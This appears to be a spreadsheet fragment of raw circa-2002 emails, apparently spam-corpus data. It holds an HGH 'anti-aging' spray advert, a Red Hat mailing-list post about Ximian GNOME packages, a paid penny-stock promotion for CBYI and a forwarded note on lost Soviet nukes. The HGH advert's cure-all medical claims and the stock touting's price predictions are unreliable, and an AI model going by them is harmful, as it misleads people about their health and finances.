 =3D=22uuid:C2F41010-65B3-11d1-A29F-00AA00C14882=22&gt;
 &lt;head&gt;
 &lt;=21--=5Bif gte mso 9=5D&gt;&lt;xml&gt;
 &lt;mso:CustomDocumentProperties&gt;
 &lt;mso:Categories msdt:dt=3D=22string=22&gt;Business&lt;/mso:Categories&gt;
 &lt;mso:Approval_x0020_Level msdt:dt=3D=22string=22&gt;&lt;/mso:Approval_x0020_Leve=
 l&gt;
 &lt;mso:Assigned_x0020_To msdt:dt=3D=22string=22&gt;&lt;/mso:Assigned_x0020_To&gt;
 &lt;/mso:CustomDocumentProperties&gt;
 &lt;/xml&gt;&lt;=21=5Bendif=5D--&gt;
 &lt;title&gt;EVER YOUNG Nutritionals GH 2000 - Reverse Aging&lt;/title&gt;
 &lt;meta http-equiv=3D=22Content-Type=22 content=3D=22text/html; charset=3Dwindo=
 ws-1252=22&gt;
 &lt;/head&gt;
 &lt;body link=3D=22=23009999=22 vlink=3D=22=23009999=22 alink=3D=22=23009999=22&gt;
 &lt;table width=3D=22760=22 border=3D=220=22 cellspacing=3D=223=22 cellpadding=3D=223=
 =22&gt;
   &lt;tr align=3D=22center=22&gt; 
     &lt;td colspan=3D=223=22 valign=3D=22middle=22&gt;&lt;strong&gt;
     &lt;font size=3D=225=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23=
 009999=22&gt;Feeling 
     Young Is A Choice&lt;/font&gt;&lt;font size=3D=224=22 face=3D=22Arial, Helvetica,=
  sans-serif=22&gt;&lt;br&gt;
       &lt;/font&gt;&lt;/strong&gt;&lt;b&gt;&lt;font size=3D=225=22 face=3D=22Arial=22&gt;Your Source =
 For Anti-Aging 
     Information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td width=3D=2242%=22 height=3D=22979=22 align=3D=22center=22 valign=3D=22top=22=
 &gt; 
       &lt;table width=3D=2270=22 border=3D=220=22 cellspacing=3D=223=22 cellpadding=
 =3D=223=22&gt;
         &lt;tr&gt; 
           &lt;td width=3D=2264%=22&gt;
           &lt;img src=3D=22http://www.everyoung-gh.net/images/2296b.jpg=22 bo=
 rder=3D=220=22 width=3D=2297=22 height=3D=22128=22&gt;&lt;/td&gt;
           &lt;td width=3D=2219%=22&gt;
           &lt;img src=3D=22http://www.everyoung-gh.net/images/2382.jpg=22 wid=
 th=3D=2293=22 height=3D=22126=22&gt;&lt;/td&gt;
           &lt;td width=3D=2217%=22&gt;&lt;font face=3D=22Arial=22&gt;&lt;span
                 style=3D=22font-size: 10.0pt=22&gt;
           &lt;img border=3D=220=22
                 src=3D=22http://www.everyoung-gh.net/images/2202.jpg=22 al=
 ign=3Dright hspace=3D15 vspace=3D10 width=3D=2286=22 height=3D=22126=22&gt;&lt;/span&gt;&lt;/=
 font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D=22center=22 valign=3D=22top=22 bgcolor=3D=22=23009999=22&gt; 
           &lt;td colspan=3D=223=22&gt;&lt;font color=3D=22=23FFFFFF=22 size=3D=222=22 face=
 =3D=22Arial, Helvetica, sans-serif=22&gt;&lt;br&gt;
             &lt;/font&gt;&lt;font color=3D=22=23FFFFFF=22 size=3D=222=22 face=3D=22Verdan=
 a=22&gt;
             &lt;strong&gt;&lt;font size=3D=223=22&gt;Here's what doctors and users&lt;br&gt;=
             are saying about EverYoung&lt;br&gt;
             Nutritionals GH2000 spray:&lt;/font&gt;&lt;/strong&gt;&lt;br&gt;
             &lt;/font&gt;&lt;font color=3D=22=23FFFFFF=22 size=3D=222=22 face=3D=22Arial,=
  Helvetica, sans-serif=22&gt;
             &lt;br&gt;
             &lt;b&gt;&amp;=238220;After 2 weeks, I noticed a&lt;br&gt;
             higher level of energy,&lt;br&gt;
             increased sexual&lt;br&gt;
             energy and my memory and&lt;br&gt;
             vision were enhanced.&amp;quot;&lt;br&gt;
             Dr. Richard Boyd&lt;br&gt;
             __________________&lt;br&gt;
             &lt;br&gt;
             &amp;=238220;Wrinkles have disappeared&lt;br&gt;
             from my hands and around&lt;br&gt;
             my eyes; my beard, which&lt;br&gt;
             was almost entirely white has&lt;br&gt;
             returned to its original&lt;br&gt;
             black color; sleep patterns have&lt;br&gt;
             returned to those of my&lt;br&gt;
             youth, I have sexually&lt;br&gt;
             returned to my mid-teens.&amp;=238221;&lt;br&gt;
             Dr. Mark Born&lt;br&gt;
             __________________ &lt;br&gt;
             &lt;br&gt;
             &amp;quot;This is the second time I have&lt;br&gt;
             ordered and I'm having great&lt;br&gt;
             success with your product.&lt;br&gt;
             I am 43, and was going through&lt;br&gt;
             the yucky midlife stuff women go&lt;br&gt;
             through...hot flashes, mood swings,&lt;br&gt;
             etc. All that has stopped and feel&lt;br&gt;
             great again. Was shocked to see&lt;br&gt;
             my gray hairs go away in just a&lt;br&gt;
             month. This product is amazing...&lt;br&gt;
             Thanks again=21&amp;quot; &lt;br&gt;
             Deanne in Alaska&lt;/b&gt;&lt;br&gt;
             &lt;font color=3D=22=23009999=22&gt;.. &lt;/font&gt;&lt;br&gt;
             &lt;font color=3D=22=23009999=22&gt;... &lt;/font&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt; 
           &lt;td colspan=3D=223=22&gt;&lt;p align=3D=22center=22&gt;&lt;font size=3D=223=22 fac=
 e=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;strong&gt;&lt;em&gt;&lt;font size=3D=224=22&gt;&lt;font =
 color=3D=22=23FF0000=22&gt;&lt;br&gt;
               &lt;br&gt;
               &lt;/font&gt;&lt;/font&gt;&lt;/em&gt;&lt;/font&gt;&lt;em&gt;&lt;font color=3D=22=23FF0000=22&gt;
           &lt;font size=3D=225=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;FREE=
  U.S. &lt;br&gt;
           Fed Ex Ground&lt;/font&gt;&lt;/font&gt;&lt;/em&gt;&lt;font color=3D=22=23FF0000=22 siz=
 e=3D=223=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;em&gt;&lt;br&gt;
               Shipping &amp;amp; Handling&lt;br&gt;
               For Customers in&lt;br&gt;
               The Continental USA.&lt;br&gt;
               &lt;br&gt;
               We Ship Anywhere In The World=21&lt;/em&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/p&gt;&lt;=
 /td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&lt;/td&gt;
     &lt;td colspan=3D=222=22 align=3D=22center=22 valign=3D=22top=22&gt;
     &lt;table width=3D=22374=22 border=3D=220=22 cellspacing=3D=223=22 cellpadding=3D=
 =223=22&gt;
         &lt;tr align=3D=22center=22 valign=3D=22top=22&gt; 
           &lt;td colspan=3D=223=22 width=3D=22362=22&gt;&lt;p&gt;&lt;font size=3D=222=22 face=3D=
 =22Arial, Helvetica, sans-serif=22&gt;&lt;strong&gt;&lt;font size=3D=223=22&gt;Starting 
               Today, You Can Look Younger, &lt;br&gt;
               Feel Better And Get Stronger With The&lt;br&gt;
               Time-Tested Power of HGH
           &lt;a href=3D=22http://www.everyoung-gh.net/ey.html=22&gt;Learn More&lt;/=
 a&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/p&gt;
             &lt;p&gt;
             &lt;img src=3D=22http://www.everyoung-gh.net/images/GHDecline1.g=
 if=22 width=3D=22200=22 height=3D=22187=22&gt;&lt;/p&gt;
             &lt;table width=3D=22100%=22 border=3D=220=22 cellspacing=3D=223=22 cel=
 lpadding=3D=223=22&gt;
               &lt;tr&gt; 
                 &lt;td&gt;&lt;p&gt;&lt;font size=3D=224=22 face=3D=22Arial, Helvetica, sans=
 -serif=22&gt;&lt;strong&gt;&lt;font color=3D=22009999=22 size=3D=225=22&gt;S&lt;/font&gt;&lt;/strong&gt;&lt;/=
 font&gt;&lt;font color=3D=22009999=22&gt;&lt;strong&gt;&lt;font size=3D=222=22 face=3D=22Arial, He=
 lvetica, sans-serif=22&gt;omatotropin 
                     (aka Growth Factor, hGH, HGH, Growth Hormone, GH, H=
 uman Growth 
                     Hormone) is naturally produced by the anterior pitu=
 itary gland 
                     in the brain and declines with age, so it is a natu=
 ral substance 
                     already in your body right this moment. HGH is know=
 n as the 
                     master hormone because it exerts effects over all o=
 ther hormones 
                     in the body, including Testosterone, Estrogen, Prog=
 esterone 
                     and DHEA. Augmenting declining somatotropin levels =
 by giving 
                     your body daily ingestible somatotropin, can create=
  a more 
                     youthful hormone balance that results in dramatic i=
 mprovements 
                     in your health.&lt;br&gt;
                     &amp;nbsp; Somatotropin supplementation 
                     is a life-enhancement. Lives that were once shatter=
 ed by fatigue, 
                     illness or the ravages of aging, now fourish with t=
 he help 
                     of somatotropin supplementation.&lt;br&gt;
                     &amp;nbsp; Somatotropin from the pituitary 
                     works by stimulating protein production in all tiss=
 ues of 
                     the body. This results in an increase in organ heal=
 ing and 
                     regeneration, which is associated with increase res=
 istance 
                     to illness and injury.&lt;/font&gt;&lt;/strong&gt;&lt;/font&gt;&lt;font =
 size=3D=222=22 face=3D=22Arial, Helvetica, sans-serif=22&gt; 
                     &lt;/font&gt;&lt;/p&gt;
                   &lt;p align=3D=22center=22&gt;&lt;font size=3D=222=22 face=3D=22Arial,=
  Helvetica, sans-serif=22&gt;&lt;br&gt;
                     &lt;font size=3D=223=22&gt;&lt;strong&gt;No matter your age, we GU=
 ARANTEE&lt;br&gt;
                     you will look and feel BETTER than&lt;br&gt;
                     you ever imagined possible.&lt;br&gt;
                     &lt;a href=3D=22http://www.everyoung-gh.net/ey.html=22&gt;LE=
 ARN MORE&lt;/a&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D=22center=22 valign=3D=22middle=22&gt; 
           &lt;td height=3D=22132=22 width=3D=22116=22&gt;
           &lt;p align=3D=22left=22&gt;
           &lt;img src=3D=22http://www.everyoung-gh.net/images/gh1.jpg=22 widt=
 h=3D=2242=22 height=3D=22129=22&gt;&lt;/td&gt;
           &lt;td width=3D=22111=22&gt;
           &lt;img src=3D=22http://www.everyoung-gh.net/images/AFBtl.jpg=22 wi=
 dth=3D=2270=22 height=3D=22130=22 align=3D=22left=22&gt;&lt;/td&gt;
           &lt;td width=3D=22117=22&gt;
           &lt;img src=3D=22http://www.everyoung-gh.net/images/BothBG.jpg=22 w=
 idth=3D=22106=22 height=3D=22130=22 align=3D=22left=22&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D=22left=22 valign=3D=22top=22&gt; 
           &lt;td width=3D=22111=22&gt;&lt;font size=3D=221=22 face=3D=22Arial, Helvetica=
 , sans-serif=22&gt;&lt;font color=3D=22=23000000=22 size=3D=222=22&gt;&lt;strong&gt;EVERYOUNG 
               GH2000&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;
               The maximum FDA allowable HGH sold online that stimulates=
  the anterior 
               of the pituitary gland. 2000ng per mil. Check the dosage =
 of our 
               competitors.&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D=22111=22&gt;&lt;font size=3D=221=22 face=3D=22Arial, Helvetica=
 , sans-serif=22&gt;&lt;font color=3D=22=23000000=22 size=3D=222=22&gt;&lt;strong&gt;ATOMIC 
               FUEL HGH Activator&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;
               Works in conjunction with Ever Young GH2000 and stimulate=
 s the posterior of 
               the pituitary gland. Contains essential Amino Acids for a=
  healthy 
               body.&lt;/font&gt;&lt;/td&gt;
           &lt;td width=3D=22111=22&gt;&lt;font size=3D=221=22 face=3D=22Arial, Helvetica=
 , sans-serif=22&gt;&lt;font color=3D=22=23000000=22 size=3D=222=22&gt;&lt;strong&gt;BARLEY 
               GREEN Powder &amp;amp; Caplet Tablets&lt;/strong&gt;&lt;/font&gt;&lt;br&gt;
               Most pure natural food for your living cells containing 1=
 8 Amino 
               Acids. Barley Green is an anti-oxidant and promotes alkal=
 inity and 
               healthy cells&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr align=3D=22center=22 valign=3D=22top=22&gt; 
           &lt;td colspan=3D=223=22 width=3D=22362=22&gt;&lt;font color=3D=22=23FF0000=22 s=
 ize=3D=224=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;strong&gt;
           &lt;a href=3D=22http://www.everyoung-gh.net/contact.html=22&gt;
           &lt;font color=3D=22=23FF0000=22&gt;CLICK 
             HERE TO ORDER NOW&lt;/font&gt;&lt;/a&gt;&lt;/strong&gt;&lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr align=3D=22center=22 valign=3D=22top=22&gt; 
     &lt;td colspan=3D=223=22&gt; 
       &lt;table width=3D=22100%=22 border=3D=220=22 cellspacing=3D=223=22 cellpaddi=
 ng=3D=223=22&gt;
         &lt;tr align=3D=22left=22 valign=3D=22middle=22&gt; 
           &lt;td&gt;&lt;strong&gt;&lt;font color=3D=22=23000000=22 size=3D=223=22 face=3D=22Ari=
 al, Helvetica, sans-serif=22&gt;Human 
             Growth Hormone &lt;br&gt;
             (HGH) allows users to:&lt;/font&gt;&lt;font color=3D=22=23006666=22 size=
 =3D=222=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;br&gt;
             &lt;br&gt;
             &lt;font color=3D=22=23009999=22&gt;Burn fat&lt;br&gt;
             Build lean muscle&lt;br&gt;
             Sleep better&lt;br&gt;
             Lucid dreams&lt;br&gt;
             Anti-aging&lt;br&gt;
             Reduce cellulite&lt;br&gt;
             Soften skin and wrinkles &lt;/font&gt;&lt;br&gt;
             &lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
           &lt;td&gt;&lt;strong&gt;&lt;font color=3D=22=23009999=22 size=3D=222=22 face=3D=22Ari=
 al, Helvetica, sans-serif=22&gt;&lt;br&gt;
             Faster injury healing&lt;br&gt;
             Improve vision&lt;br&gt;
             Increase stamina&lt;br&gt;
             Reverse osteoporosis&lt;br&gt;
             Eliminate depression&lt;br&gt;
             Eliminate chronic fatigue&lt;br&gt;
             Improve exercise performance&lt;br&gt;
             Reduce high blood pressure&lt;br&gt;
             Sexual performance &amp;amp; pleasure &lt;/font&gt;&lt;/strong&gt;&lt;/td&gt;
           &lt;td&gt; &lt;p&gt;&lt;strong&gt;&lt;font color=3D=22=23009999=22&gt;&lt;font size=3D=222=22 f=
 ace=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;br&gt;
               Increase energy &amp;amp; motivation&lt;br&gt;
               Increase HDL (good cholesterol)&lt;br&gt;
               Decrease LDL (bad cholesterol)&lt;br&gt;
               Enhance immune functions&lt;br&gt;
               Reduced joint pain &amp;amp; stiffness&lt;br&gt;
               Healthier, more lustrious hair&lt;br&gt;
               ....and many more benefits&lt;br&gt;
               &lt;/font&gt;&lt;/font&gt;&lt;font size=3D=222=22 face=3D=22Arial, Helvetica,=
  sans-serif=22&gt;Visit our web site at&lt;br&gt;
               &lt;font color=3D=22=23009999=22&gt;
               &lt;a href=3D=22http://www.everyoung-gh.net=22&gt;&lt;font color=3D=22=23=
 000000=22&gt;http://www.everyoung-gh.net&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/strong&gt;&lt;/=
 p&gt;&lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td colspan=3D=223=22 align=3D=22center=22 valign=3D=22top=22&gt;&lt;p&gt;&lt;b&gt;
     &lt;font size=3D=222=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;br&gt;
     &lt;br&gt;
     &lt;br&gt;
     Your 
         privacy is extremely important to us.&lt;/font&gt;&lt;font size=3D=221=22 f=
 ace=3D=22Arial, Helvetica, sans-serif=22&gt;&lt;br&gt;
         This message is sent to you because you were selected as a qual=
 ified recipient 
         of our &lt;br&gt;
         special introductory promotion for Ever Young Nutritionals GH20=
 00 at&lt;br&gt;
         &lt;a href=3D=22http://www.everyoung-gh.net=22&gt;http://www.everyoung-g=
 h.net&lt;/a&gt;&lt;br&gt;
     &lt;br&gt;
         To be removed at any time simply, click
     &lt;a href=3D=22mailto:rimmail=40ezmail.ru?subject=3DRemove+e-mail_eygh=22&gt;=
 here&lt;/a&gt;&lt;/font&gt;&lt;font size=3D=222=22 face=3D=22Arial, Helvetica, sans-serif=22&gt;=
 .&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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Well, I tried the Ximian GNOME 2.0 packages from
 http://apt.sunnmore.net, and have to say, it was a let-down.  Ran
 'apt-get update' , 'apt-get install gnome-session' then 'apt-get
 upgrade' and Nautilus failed to execute, couldn't get any help docs to
 come up, along with more problems.  So, with the luck of 'rpm -qa|grep
 ximian' then removing by hand all ximian packages with 'rpm -e --nodeps'
 and reinstalling everything GNOME and GNOME-related with apt, I got
 trusty old Red Hat 7.3 GNOME back on the desktop, and the only trace of
 Ximian is Evolution, again, thanks to apt from this site.
 I really liked Ximian (back then, Helix ?) at first but, to me, Red
 Hat's GNOME, released with 7.3 seems much more pretty and up-to-date. 
 Could this be because of inclusion of gtk2 in RH 7.3?
 Lance  
 On Fri, 2002-07-26 at 07:40, Michl Alexandre Salim wrote:
 &gt;  --- Angles Puglisi &lt;angles@aminvestments.com&gt; wrote:
 &gt; &gt; 
 &gt; &gt; I still think there's got to be a way to get the
 &gt; &gt; packages that make gnomehide
 &gt; &gt; from the Limbo CDs, they would be newer.
 &gt; &gt; 
 &gt; Surely you just need to recompile and install them in
 &gt; order?
 &gt; 
 &gt; Ximian packages are awful - I had recurring problems
 &gt; with their packaged libxslt a few months back.
 &gt; 
 &gt; Regards,
 &gt; 
 &gt; Michel
 &gt; 
 &gt; __________________________________________________
 &gt; Do You Yahoo!?
 &gt; Everything you'll ever need on one web page
 &gt; from News and Sport to Email and Music Charts
 &gt; http://uk.my.yahoo.com
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 -- 
 :       _ /~\'_
          (o o)
 =====oooO==U==Oooo================[Joe Ramaswamy]==========
 THE LEWINSKY virus..
 (Sucks all the memory out of your computer, 
 then Emails everyone about what it did)
 ============================[URL:http://devil.net/joe_r/]==
 :
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: &lt;&gt;&lt;&gt;&lt;&gt; TOMORROWS WINNERS TODAY &lt;&gt;&lt;&gt;&lt;&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;META http-equiv=3D=22Content-Type=22 content=3D=22=
 text/html; charset=3Dwindows-1252=22&gt;&lt;STYLE&gt;A:link =7BTEX-DECORATION: none=7D=
 A:active =7BTEXT-DECORATION: none=7DA:visited =7BTEXT-DECORATION: none=7DA:h=
 over =7BCOLOR: =230033ff; TEXT-DECORATION: underline=7D&lt;/STYLE&gt;&lt;META conten=
 t=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgColor=
 =3D=22=23CCCC99=22&gt;&lt;TABLE borderColor=3D=22=23660000=22 cellSpacing=3D=220=22 cellP=
 adding=3D=220=22 border=3D=220=22 width=3D=22100%=22&gt;&lt;TR&gt;&lt;TD bgColor=3D=22=23CCCC99=22=
  valign=3D=22top=22 colspan=3D=222=22 height=3D=2227=22&gt;
 &lt;font size=3D=226=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660=
 000=22&gt;
 &lt;b&gt;OTC&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694f=22&gt;=
 &lt;font size=3D=225=22 face=3D=22Times New Roman, Times, serif=22 color=3D=22=23FF=
 FFFF=22&gt;
 &lt;b&gt;&amp;nbsp;Newsletter&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694=
 f=22&gt;&lt;div align=3D=22right=22&gt;&lt;font color=3D=22=23FFFFFF=22&gt;
 &lt;b&gt;Discover Tomorrow's Winners&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD =
 height=3D=2225=22 colspan=3D=222=22 bgcolor=3D=22=23CCCC99=22&gt;&lt;table width=3D=22100%=
 =22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=225=22&gt;&lt;tr&gt;&lt;td valign=3D=22=
 middle=22 height=3D=222=22&gt;&lt;table width=3D=22300=22 border=3D=221=22 cellspacing=3D=
 =220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22 bgcolor=3D=22=23EBEDCB=22=
  height=3D=225=22 align=3D=22center=22&gt;&lt;tr&gt;&lt;td valign=3D=22middle=22 height=3D=228=22=
 &gt;&lt;div align=3D=22center=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660000=22 size=3D=
 =225=22&gt;
 &lt;b&gt;For Immediate Release&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;t=
 r&gt;&lt;td&gt;&lt;table width=3D=22100%=22 border=3D=221=22 cellspacing=3D=220=22 cellpaddin=
 g=3D=228=22 align=3D=22center=22 bgcolor=3D=22=23fafaf5=22 bordercolor=3D=22=23660000=
 =22&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23fafaf5=22 valign=3D=22top=22 height=3D=22453=22&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;Cal-Bay (Stock Symbol: CBYI)&lt;/b&gt;
 &lt;br&gt;Watch for analyst =22Strong Buy Recommendations=22 and several adviso=
 ry newsletters picking CBYI.  CBYI has filed to be traded on the OTCBB, =
 share prices historically INCREASE when companies get listed on this lar=
 ger trading exchange. CBYI is trading around 25 cents and should skyrock=
 et to =242.66 - =243.25 a share in the near future.&lt;br&gt;
 &lt;b&gt;&lt;i&gt;Put CBYI on your watch list, acquire a position TODAY.&lt;/i&gt;&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;REASONS TO INVEST IN CBYI&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 A profitable company and is on track to beat ALL earnings estimates=21&lt;/=
 font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 One of the FASTEST growing distributors in environmental &amp;amp; safety e=
 quipment instruments.&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 color=3D=22=2300=
 0000=22 size=3D=22-1=22&gt;
 Excellent management team, several EXCLUSIVE contracts.  IMPRESSIVE cli=
 ent list including the U.S. Air Force, Anheuser-Busch, Chevron Refining =
 and Mitsubishi Heavy Industries, GE-Energy &amp;amp; Environmental Research.=
 &lt;/font&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;RAPIDLY GROWING INDUSTRY&lt;/b&gt;
 &lt;br&gt;Industry revenues exceed =24900 million, estimates indicate that the=
 re could be as much as =2425 billion from =22smell technology=22 by the end=
  of 2003.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;=21=21=21=21=21CONGRATULATIONS=21=21=21=21=21&lt;/b&gt;&lt;br&gt;Our last recommendation t=
 o buy ORBT at =241.29 rallied and is holding steady at =243.50=21 Congratul=
 ations to all our subscribers that took advantage of this recommendation=
 .&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D=22center=22&gt;&lt;font size=3D=22-1=22 face=3D=22Verdana, Arial, Helveti=
 ca, sans-serif=22 color=3D=22=23660000=22&gt;
 ALL removes HONORED. Please allow 7 days to be removed and send ALL add=
 resses to:
 &lt;font color=3D=23ff0000&gt;
 &lt;a href=3D=22mailto:goneforgood=40btamail.net.cn=22&gt;GoneForGood=40btamail.ne=
 t.cn
 &lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=3D=22100%=22 border=3D=221=22 c=
 ellspacing=3D=220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D=22=23660000=22 height=3D=228=22&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23=
 FFFFCC=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspacing=3D=220=22 cellpad=
 ding=3D=224=22&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font size=3D=22-2=22 face=3D=22Verdana, Arial, Helvetica, sans-serif=22&gt;
 Certain statements contained in this news release may be forward-lookin=
 g statements within the meaning of The Private Securities Litigation Ref=
 orm Act of 1995. These statements may be identified by such terms as =22e=
 xpect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or similar terms=
 . We are NOT a registered investment advisor or a broker dealer. This is=
  NOT an offer to buy or sell securities. No recommendation that the secu=
 rities of the companies profiled should be purchased, sold or held by in=
 dividuals or entities that learn of the profiled companies. We were paid=
  =2427,000 in cash by a third party to publish this report. Investing in =
 companies profiled is high-risk and use of this information is for readi=
 ng purposes only. If anyone decides to act as an investor, then it will =
 be that investor's sole risk. Investors are advised NOT to invest withou=
 t the proper advisement from an attorney or a registered financial broke=
 r. Do not rely solely on the information presented, do additional indepe=
 ndent research to form your own opinion and decision regarding investing=
  in the profiled companies. Be advised that the purchase of such high-ri=
 sk securities may result in the loss of your entire investment.  Not int=
 ended for recipients or residents of CA,CO,CT,DE,ID, IL,IA,LA,MO,NV,NC,O=
 K,OH,PA,RI,TN,VA,WA,WV,WI. Void where prohibited.  The owners of this pu=
 blication may already own free trading shares in CBYI and may immediatel=
 y sell all or a portion of these shares into the open market at or about=
  the time this report is published.  Factual statements are made as of t=
 he date stated and are subject to change without notice.
 &lt;br&gt;Copyright c 2001&lt;/font&gt;&lt;hr width=3D=22100%=22 noShade size=3D=221=22&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD cols=
 pan=3D=222=22 height=3D=2231=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspaci=
 ng=3D=220=22 cellpadding=3D=224=22&gt;&lt;tr&gt;&lt;td width=3D=2287%=22 height=3D=2221=22&gt;&lt;div =
 align=3D=22right=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;td width=3D=227%=22 he=
 ight=3D=2221=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=226=22 color=3D=22=23FFF=
 FFF=22&gt;
 OTC&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;td width=3D=226%=22 height=3D=2221=22&gt;&lt;div align=3D=22le=
 ft=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/=
 TR&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 *********
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW: Wanna buy a nuke?
</t>
  </si>
  <si>
    <t xml:space="preserve">I have been told to take anything read in Pravda with a grain of salt...
 but
 this article certainly looks impressive when paired together with this other
 one from the associated press...
 Just the concept makes me shudder, imagining how easy it must be to smuggle
 these things around some parts of Europe right now.
 Hopefully, it's just my imagination.
 -- Michael Cummins
    Fort Lauderdale, FL
 ----------------------------------------------------------------------------
 ----
 http://english.pravda.ru/main/2002/09/13/36519.html
 11:14 2002-09-13
 200 SOVIET NUKES LOST IN UKRAINE
 ----------------------------------------------------------------------------
 ----
 http://story.news.yahoo.com/news?tmpl=story2&amp;cid=518&amp;ncid=518&amp;e=51&amp;u=/ap/200
 20903/ap_on_re_eu/ukraine_iraq_3
 Ukraine-Iraq Arms Deals Alleged
 Tue Sep 3, 6:07 PM ET
 By TIM VICKERY, Associated Press Writer
 ----------------------------------------------------------------------------
 ----
